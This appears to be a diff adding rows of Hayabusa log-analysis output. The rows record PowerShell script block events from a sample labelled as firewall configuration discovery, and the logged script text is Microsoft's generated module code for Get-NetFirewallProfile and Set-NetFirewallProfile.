+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 